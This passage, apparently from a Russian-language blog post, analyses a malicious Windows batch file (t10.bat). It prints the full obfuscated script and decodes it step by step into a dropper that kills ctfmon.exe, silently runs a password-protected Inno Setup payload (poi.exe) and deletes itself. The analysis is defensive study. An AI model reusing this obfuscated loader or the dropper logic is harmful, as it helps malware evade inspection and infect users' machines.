\u043f\u043e\u0438\u0437\u0443\u0447\u0430\u0442\u044c: \u043d\u043e \u043d\u0435 \u0442\u0443\u0442-\u0442\u043e \u0431\u044b\u043b\u043e! \u0422\u0430\u043a\u043e\u0433\u043e \u0432\u0438\u0434\u0435\u0442\u044c \u043c\u043d\u0435 \u0435\u0449\u0451 \u043d\u0435 \u043f\u0440\u0438\u0445\u043e\u0434\u0438\u043b\u043e\u0441\u044c.<\/p>\n
\u0412\u043d\u0443\u0442\u0440\u0438 t10.bat \u0431\u044b\u043b\u043e \u0432\u043e\u0442 \u044d\u0442\u043e.<\/b><\/p>\n
\n
set iDVrlM=set %iDVrlM% pGJV= %iDVrlM%%pGJV%lVOMlhijX== %iDVrlM%%pGJV%GcayqJj%lVOMlhijX%{ %iDVrlM%%pGJV%DysQd%lVOMlhijX%i %iDVrlM%%pGJV%zSdh%lVOMlhijX%0 %iDVrlM%%pGJV%IyEwFH%lVOMlhijX%W %iDVrlM%%pGJV%wgHafh%lVOMlhijX%d %iDVrlM%%pGJV%EyadtMp%lVOMlhijX%f %iDVrlM%%pGJV%ipCNKA%lVOMlhijX%5 %iDVrlM%%pGJV%QYFaxm%lVOMlhijX%* %iDVrlM%%pGJV%VTlcnvcrw%lVOMlhijX%] %iDVrlM%%pGJV%rirX%lVOMlhijX%M %iDVrlM%%pGJV%iKwg%lVOMlhijX%_ %iDVrlM%%pGJV%RASAyUS%lVOMlhijX%? %iDVrlM%%pGJV%heoAiQ%lVOMlhijX%g %iDVrlM%%pGJV%uMCoFRy%lVOMlhijX%\/ %iDVrlM%%pGJV%hxUEB%lVOMlhijX%$ %iDVrlM%%pGJV%JzIoznwCO%lVOMlhijX%v %iDVrlM%%pGJV%dbqUTP%lVOMlhijX%! %iDVrlM%%pGJV%KepbD%lVOMlhijX%# %iDVrlM%%pGJV%LXEX%lVOMlhijX%s %iDVrlM%%pGJV%LpfBjM%lVOMlhijX%@ %iDVrlM%%pGJV%UahIVhihw%lVOMlhijX%I %iDVrlM%%pGJV%uCYMaI%lVOMlhijX%- %iDVrlM%%pGJV%vmit%lVOMlhijX%D %iDVrlM%%pGJV%MCWbFLDjD%lVOMlhijX%E %iDVrlM%%pGJV%knPXvDj%lVOMlhijX%7 %iDVrlM%%pGJV%YEhMVMG%lVOMlhijX%; %iDVrlM%%pGJV%wTULRTl%lVOMlhijX%1 %iDVrlM%%pGJV%Jrjse%lVOMlhijX%q %iDVrlM%%pGJV%NDAI%lVOMlhijX%x %iDVrlM%%pGJV%lUEuKBc%lVOMlhijX%U %iDVrlM%%pGJV%HriWu%lVOMlhijX%8 %iDVrlM%%pGJV%VMaInwUi%lVOMlhijX%w %iDVrlM%%pGJV%KrGSTTdN%lVOMlhijX%9 %iDVrlM%%pGJV%XokcwjROA%lVOMlhijX%\\ %iDVrlM%%pGJV%DdlJvxpBT%lVOMlhijX%y %iDVrlM%%pGJV%LVicuKuUF%lVOMlhijX%F %iDVrlM%%pGJV%hnydIrGM%lVOMlhijX%B %iDVrlM%%pGJV%RXvHWsxrp%lVOMlhijX%4 %iDVrlM%%pGJV%dIYiPoN%lVOMlhijX%} %iDVrlM%%pGJV%ukXME%lVOMlhijX%+ %iDVrlM%%pGJV%gWSgSMYA%lVOMlhijX%T %iDVrlM%%pGJV%IYBhtEnG%lVOMlhijX%e %iDVrlM%%pGJV%yBLVgYi%lVOMlhijX%N %iDVrlM%%pGJV%YYRSUQ%lVOMlhijX%z %iDVrlM%%pGJV%UbHph%lVOMlhijX%P %iDVrlM%%pGJV%fTsricQFz%lVOMlhijX%k %iDVrlM%%pGJV%gkNnIB%lVOMlhijX%2 %iDVrlM%%pGJV%ztzbgDRjB%lVOMlhijX%j %iDVrlM%%pGJV%TMmw%lVOMlhijX%n %iDVrlM%%pGJV%bFpwLXPA%lVOMlhijX%p %iDVrlM%%pGJV%UjcGDFmD%lVOMlhijX%a %iDVrlM%%pGJV%ydOvR%lVOMlhijX%Y %iDVrlM%%pGJV%cpwfdcVIC%lVOMlhijX%" %iDVrlM%%pGJV%sIMODTo%lVOMlhijX%) %iDVrlM%%pGJV%reSQtdOC%lVOMlhijX%[ %iDVrlM%%pGJV%LnzWsIe%lVOMlhijX%6 %iDVrlM%%pGJV%gJBfV%lVOMlhijX%L %iDVrlM%%pGJV%XmuWmdma%lVOMlhijX%. %iDVrlM%%pGJV%sAGBcVq%lVOMlhijX%h %iDVrlM%%pGJV%GmXLXKBWD%lVOMlhijX%O %iDVrlM%%pGJV%CwxeyCrE%lVOMlhijX%t %iDVrlM%%pGJV%mmTzf%lVOMlhijX%l %iDVrlM%%pGJV%aTVdF%lVOMlhijX%r %iDVrlM%%pGJV%ILOSfqlmf%lVOMlhijX%Z %iDVrlM%%pGJV%WsGmIpaah%lVOMlhijX%R %iDVrlM%%pGJV%yJgKHTGjV%lVOMlhijX%C %iDVrlM%%pGJV%TPqwMwH%lVOMlhijX%Q %iDVrlM%%pGJV%hJJAtBUgr%lVOMlhijX%H %iDVrlM%%pGJV%hHpkv%lVOMlhijX%m %iDVrlM%%pGJV%wlLk%lVOMlhijX%b %iDVrlM%%pGJV%hlbFW%lVOMlhijX%, %iDVrlM%%pGJV%cGSDDWyd%lVOMlhijX%X %iDVrlM%%pGJV%phqNn%lVOMlhijX%J %iDVrlM%%pGJV%fPbur%lVOMlhijX%S %iDVrlM%%pGJV%eOigMGv%lVOMlhijX%u %iDVrlM%%pGJV%CbAKNK%lVOMlhijX%K %iDVrlM%%pGJV%IWaff%lVOMlhijX%3 %iDVrlM%%pGJV%sccH%lVOMlhijX%c %iDVrlM%%pGJV%PoATNXt%lVOMlhijX%o %iDVrlM%%pGJV%tdMSJfDrF%lVOMlhijX%V %iDVrlM%%pGJV%ITymyoQK%lVOMlhijX%: %iDVrlM%%pGJV%eaOFc%lVOMlhijX%G %iDVrlM%%pGJV%Bucwql%lVOMlhijX%A %iDVrlM%%pGJV%lcDFKx%lVOMlhijX%( %LpfBjM%%MCWbFLDjD%%sccH%%sAGBcVq%%PoATNXt%%pGJV%%GmXLXKBWD%%EyadtMp%%EyadtMp% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%uCYMaI%%TMmw%%pGJV%%gkNnIB%%pGJV%%heoAiQ%%PoATNXt%%PoATNXt%%heoAiQ%%mmTzf%%IYBhtEnG%%XmuWmdma%%sccH%%PoATNXt%%hHpkv%|%LVicuKuUF%%DysQd%%TMmw%%wgHafh%%pGJV%%uMCoFRy%%UahIVhihw%%pGJV%%cpwfdcVIC%%gWSgSMYA%%gWSgSMYA%%gJBfV%%lVOMlhijX%%cpwfdcVIC%||%heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%TMmw%%IYBhtEnG%%NDAI%%CwxeyCrE%%pGJV% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %CwxeyCrE%%UjcGDFmD%%LXEX%%fTsricQFz%%fTsricQFz%%DysQd%%mmTzf%%mmTzf%%pGJV%%uMCoFRy%%EyadtMp%%pGJV%%uMCoFRy%%DysQd%%hHpkv%%pGJV%%sccH%%CwxeyCrE%%EyadtMp%%hHpkv%%PoATNXt%%TMmw%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG%%pGJV%%uMCoFRy%%JzIoznwCO%%IYBhtEnG%%aTVdF%%DdlJvxpBT%%LXEX%%DysQd%%mmTzf%%IYBhtEnG%%TMmw%%CwxeyCrE%%pGJV%%uMCoFRy%%UbHph%%UjcGDFmD%%LXEX%%LXEX%%VMaInwUi%%PoATNXt%%aTVdF%%wgHafh%%lVOMlhijX%%IWaff%%RXvHWsxrp%%ipCNKA%%RXvHWsxrp%%LnzWsIe%%ipCNKA%%wTULRTl%%gkNnIB%%gkNnIB%%IWaff%%RXvHWsxrp%%ipCNKA% %bFpwLXPA%%DysQd%%TMmw%%heoAiQ%%pGJV%%mmTzf%%PoATNXt%%sccH%%UjcGDFmD%%mmTzf%%sAGBcVq%%PoATNXt%%LXEX%%CwxeyCrE%%pGJV%%uCYMaI%%wTULRTl%%zSdh% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% %heoAiQ%%PoATNXt%%CwxeyCrE%%PoATNXt%%pGJV%%wTULRTl% :next %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%bFpwLXPA%%PoATNXt%%DysQd%%XmuWmdma%%IYBhtEnG%%NDAI%%IYBhtEnG% %wgHafh%%IYBhtEnG%%mmTzf%%pGJV%%0%pGJV%>%pGJV%%TMmw%%eOigMGv%%mmTzf% :1 %MCWbFLDjD%%NDAI%%DysQd%%CwxeyCrE%%pGJV% <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041f\u043e\u0445\u043e\u0434\u0438\u043b\u043e \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u0442\u043e \u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u043e\u0442 \u0410\u043b\u0435\u043a\u0441\u0430 \u042e\u0441\u0442\u0430\u0441\u0443. \u041f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0440\u0430\u0437\u0431\u0438\u0440\u0430\u0442\u044c\u0441\u044f.<\/p>\n
  \u041f\u0435\u0440\u0432\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u043e\u0439 \u0448\u043b\u043e:  <\/p>\n
set iDVrlM=set <\/code><\/pre>\n
  \u042f\u0441\u043d\u043e, \u0447\u0442\u043e \u0432 \u0442\u0435\u043a\u0441\u0442\u0435 \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 ‘%iDVrlM%’ \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u043d\u0430 ‘set’. \u0421\u043a\u0430\u0437\u0430\u043d\u043e \u2014 \u0441\u0434\u0435\u043b\u0430\u043d\u043e:  <\/p>\n
set iDVrlM=set set pGJV= set%pGJV%lVOMlhijX== set%pGJV%GcayqJj%lVOMlhijX%{ ...\u043d\u0443 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435: \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0438\u0430\u043b\u044c\u043d\u043e. <\/code><\/pre>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u0432\u0442\u043e\u0440\u0430\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u0441\u0442\u0430\u043b\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u043e-\u0447\u0435\u043b\u043e\u0432\u0435\u0447\u0435\u0441\u043a\u0438. \u041f\u043e\u0441\u043b\u0435 \u0437\u043d\u0430\u043a\u0430 \u0440\u0430\u0432\u043d\u043e \u0432 \u043d\u0435\u0439 \u0441\u0442\u043e\u0438\u0442 \u043f\u0440\u043e\u0431\u0435\u043b (\u0437\u0434\u0435\u0441\u044c \u043d\u0430 \u043a\u043e\u0434\u0435 \u044d\u0442\u043e\u0433\u043e \u043d\u0435 \u0432\u0438\u0434\u043d\u043e). \u041f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0442\u0435\u043f\u0435\u0440\u044c \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 ‘%pGJV%’ \u043d\u0430 \u043f\u0440\u043e\u0431\u0435\u043b:  <\/p>\n
set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj%lVOMlhijX%{ set DysQd%lVOMlhijX%i ...\u043d\u0443 \u0438 \u0442\u0430\u043a \u0434\u0430\u043b\u0435\u0435: \u043e\u043f\u044f\u0442\u044c \u0436\u0435 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u0440\u0438\u043d\u0446\u0438\u043f\u0438\u0430\u043b\u044c\u043d\u043e. <\/code><\/pre>\n
  \u0418\u0434\u0451\u043c \u0434\u0430\u043b\u044c\u0448\u0435. \u0422\u0440\u0435\u0442\u044c\u044f \u0441\u0442\u0440\u043e\u043a\u0430 \u0433\u043e\u0432\u043e\u0440\u0438\u0442 \u043d\u0430\u043c \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u043d\u0443\u0436\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0441\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 ‘%lVOMlhijX%’ \u043d\u0430 \u0437\u043d\u0430\u043a \u0440\u0430\u0432\u0435\u043d\u0441\u0442\u0432\u0430:<\/p>\n
\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0437\u0430\u043c\u0435\u043d\u044b<\/b><\/p>\n
\n
set iDVrlM=set set pGJV= set lVOMlhijX== set GcayqJj={ set DysQd=i set zSdh=0 set IyEwFH=W set wgHafh=d set EyadtMp=f set ipCNKA=5 set QYFaxm=* set VTlcnvcrw=] set rirX=M set iKwg=_ set RASAyUS=? set heoAiQ=g set uMCoFRy=\/ set hxUEB=$ set JzIoznwCO=v set dbqUTP=! set KepbD=# set LXEX=s set LpfBjM=@ set UahIVhihw=I set uCYMaI=- set vmit=D set MCWbFLDjD=E set knPXvDj=7 set YEhMVMG=; set wTULRTl=1 set Jrjse=q set NDAI=x set lUEuKBc=U set HriWu=8 set VMaInwUi=w set KrGSTTdN=9 set XokcwjROA=\\ set DdlJvxpBT=y set LVicuKuUF=F set hnydIrGM=B set RXvHWsxrp=4 set dIYiPoN=} set ukXME=+ set gWSgSMYA=T set IYBhtEnG=e set yBLVgYi=N set YYRSUQ=z set UbHph=P set fTsricQFz=k set gkNnIB=2 set ztzbgDRjB=j set TMmw=n set bFpwLXPA=p set UjcGDFmD=a set ydOvR=Y set cpwfdcVIC=" set sIMODTo=) set reSQtdOC=[ set LnzWsIe=6 set gJBfV=L set XmuWmdma=. set sAGBcVq=h set GmXLXKBWD=O set CwxeyCrE=t set mmTzf=l set aTVdF=r set ILOSfqlmf=Z set WsGmIpaah=R set yJgKHTGjV=C set TPqwMwH=Q set hJJAtBUgr=H set hHpkv=m set wlLk=b set hlbFW=, set cGSDDWyd=X set phqNn=J set fPbur=S set eOigMGv=u set CbAKNK=K set IWaff=3 set sccH=c set PoATNXt=o set tdMSJfDrF=V set ITymyoQK=: set eaOFc=G set Bucwql=A set lcDFKx=( ... <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041d\u0443 \u0432\u043e\u0442, \u0442\u0435\u043f\u0435\u0440\u044c \u043e\u0442\u043a\u0440\u044b\u043b\u0441\u044f \u0432\u0435\u0441\u044c \u0430\u043b\u0444\u0430\u0432\u0438\u0442 \u0437\u0430\u043c\u0435\u043d\u044b. \u041f\u043e\u0442\u0440\u0430\u0442\u0438\u0432 \u0435\u0449\u0451 \u043c\u0438\u043d\u0443\u0442 15, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043e\u0433\u043e \u0438 HEX-\u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u043e\u0432 \u044f \u0437\u0430\u043c\u0435\u043d\u0438\u043b \u0432\u0441\u0435 %\u0441\u0442\u0440\u043e\u043a\u0438% \u043d\u0430 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0438\u043c \u0441\u0438\u043c\u0432\u043e\u043b\u044b \u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 bat-\u0444\u0430\u0439\u043b:  <\/p>\n
@Echo Off ping -n 2 google.com|Find \/I "TTL="||goto next taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe taskkill \/f \/im ctfmon.exe poi.exe \/verysilent \/Password=345465122345 ping localhost -10 del %0 > nul goto 1 :next del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del poi.exe del %0 > nul :1 Exit <\/code><\/pre>\n
  \u0421\u0443\u0442\u044c bat-\u0444\u0430\u0439\u043b\u0430 \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u0432\u0435\u0441\u044c\u043c\u0430 \u043d\u0435\u0437\u0430\u043c\u044b\u0441\u043b\u043e\u0432\u0430\u0442\u043e\u0439: \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u043f\u0438\u043d\u0433\u0430 google.com \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u043e\u043c. \u0415\u0441\u043b\u0438 \u0441\u0432\u044f\u0437\u0438 \u043d\u0435\u0442 \u2014 poi.exe \u0443\u0434\u0430\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u0441\u0430\u043c\u0438\u043c bat-\u0444\u0430\u0439\u043b\u043e\u043c \u0438 \u043d\u0430 \u044d\u0442\u043e\u043c \u0432\u0441\u0451 \u0437\u0430\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u0435\u0442\u0441\u044f. \u0415\u0441\u043b\u0438 \u0436\u0435 \u0441\u0432\u044f\u0437\u044c \u0435\u0441\u0442\u044c, \u0442\u043e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441 ctfmon.exe, \u043f\u043e\u0442\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f poi.exe \u0441 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u00abverysilent\u00bb \u0438 \u00abPassword=345465122345\u00bb \u0438 \u043f\u043e\u0442\u043e\u043c \u0441\u0430\u043c\u043e\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0435\u0442\u0441\u044f bat-\u0444\u0430\u0439\u043b.<\/p>\n
  \u041c\u043d\u0435 \u0442\u0430\u043a \u0438 \u043e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u043d\u0435\u044f\u0441\u043d\u044b\u043c \u0434\u0432\u0430 \u043c\u043e\u043c\u0435\u043d\u0442\u0430 \u2014 \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u00abping localhost -10\u00bb \u0438 \u043a \u0447\u0435\u043c\u0443 \u044d\u0442\u0438 \u043c\u043d\u043e\u0433\u043e\u043a\u0440\u0430\u0442\u043d\u044b\u0435 \u043f\u043e\u0432\u0442\u043e\u0440\u0435\u043d\u0438\u044f \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 taskkill \u0438 del?<\/p>\n
  \u041d\u0443 \u0434\u0430 \u043b\u0430\u0434\u043d\u043e. \u041f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u044f \u043f\u0440\u0438\u043d\u044f\u043b\u0441\u044f \u0437\u0430 \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 poi.exe. \u041f\u043e\u043f\u044b\u0442\u043a\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044c \u0435\u0433\u043e \u043a\u0430\u043a \u0430\u0440\u0445\u0438\u0432 \u0437\u0430\u0432\u0435\u0440\u0448\u0438\u043b\u0430\u0441\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u0435\u0439. \u041e\u0434\u043d\u0430\u043a\u043e \u0437\u0430\u043f\u0443\u0441\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0441 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u2014 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u0432\u0438\u0440\u0443\u0441\u0430 (\u043a\u0430\u043a \u043c\u043d\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c). \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043e\u0431\u0440\u0430\u0442\u0438\u043b\u0441\u044f \u043a \u043a\u043b\u0430\u0434\u0435\u0437\u0438 \u0437\u043d\u0430\u043d\u0438\u0439 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0438 \u043f\u043e \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u043c \u0441\u043b\u043e\u0432\u0430\u043c \u00abverysilent\u00bb \u0438 \u00abPassword\u00bb \u0441\u0440\u0430\u0437\u0443 \u043d\u0430\u0448\u0451\u043b \u0438\u0441\u043a\u043e\u043c\u043e\u0435: Inno Setup is a free installer for Windows programs<\/a>.<\/p>\n
  \u0420\u0430\u0437 \u043a\u0442\u043e-\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0430\u0440\u0445\u0438\u0432\u0430\u0442\u043e\u0440, \u0442\u043e \u043a\u0442\u043e-\u043d\u0438\u0431\u0443\u0434\u044c \u0434\u0440\u0443\u0433\u043e\u0439 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0434\u043e\u043b\u0436\u0435\u043d \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0449\u0438\u043a \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f \u2014 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b \u043f\u043e\u0438\u0441\u043a. \u0417\u0430\u043f\u0440\u043e\u0441 \u00abinno setup decompiler\u00bb \u0441\u0445\u043e\u0434\u0443 \u0434\u0430\u043b \u043d\u0443\u0436\u043d\u044b\u0439 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442<\/a>. \u041e\u0442\u043b\u0438\u0447\u043d\u043e! \u0421\u043a\u0430\u0447\u0430\u043b \u0435\u0433\u043e \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b:  <\/p>\n
